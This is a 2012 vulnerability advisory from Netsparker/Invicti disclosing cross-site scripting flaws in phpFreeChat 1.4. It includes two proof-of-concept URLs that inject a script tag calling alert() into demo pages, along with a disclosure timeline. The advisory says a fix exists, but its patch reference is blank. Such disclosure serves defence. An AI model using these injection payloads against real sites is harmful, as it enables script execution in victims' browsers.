Multiple Cross-site Scripting Vulnerabilities in phpFreeChat

Information

Advisory by Netsparker (now Invicti)
Name: XSS Vulnerabilities in phpFreeChat
Software: phpFreeChat 1.4 and possibly below.
Vendor Homepage: http://www.phpfreechat.net
Vulnerability Type: Cross-Site Scripting
Severity: Critical
Researcher: Mesut Timur
Advisory Reference: NS-12-010

Description

phpFreeChat is a free, simple to install, fast, customizable and multi languages chat that uses a simple filesystem for message and nickname storage.

Details

phpFreeChat is affected by XSS vulnerabilities in version 1.4.
Example PoC urls are as follows:

http://example.com/demo/demo21_with_hardcoded_urls.php?'"­­--></style></script><script>alert(0x000A26)</script>
http://example.com/demo/demo2_simple_with_params.php?'"­­--></style></script><script>alert(0x000855)</script>

Learn more about Cross-Site Scripting vulnerabilities:

Solution

The vendor fixed this vulnerability in the new version. Please see the references.

Advisory Timeline

29/06/2012 – First contact: No reply
14/08/2012 – Second contact: Sent the vulnerability details
24/09/2012 – Ask for patch/fix: No reply
02/10/2012 – Vulnerability Released

Credits

It has been discovered on testing of Invicti.

References

  1. Vendor URL / Patch: –
  2. MSL Advisory Link: /web-applications-advisories/xss-vulnerabilities-in-phpfreechat/
  3. Invicti Advisories: /web-applications-advisories/

About Invicti

Invicti Security is transforming the way web applications are secured. Invicti empowers organizations in every industry to scale their overall security operations, make the best use of their security resources, and engage developers in helping to improve their overall security posture.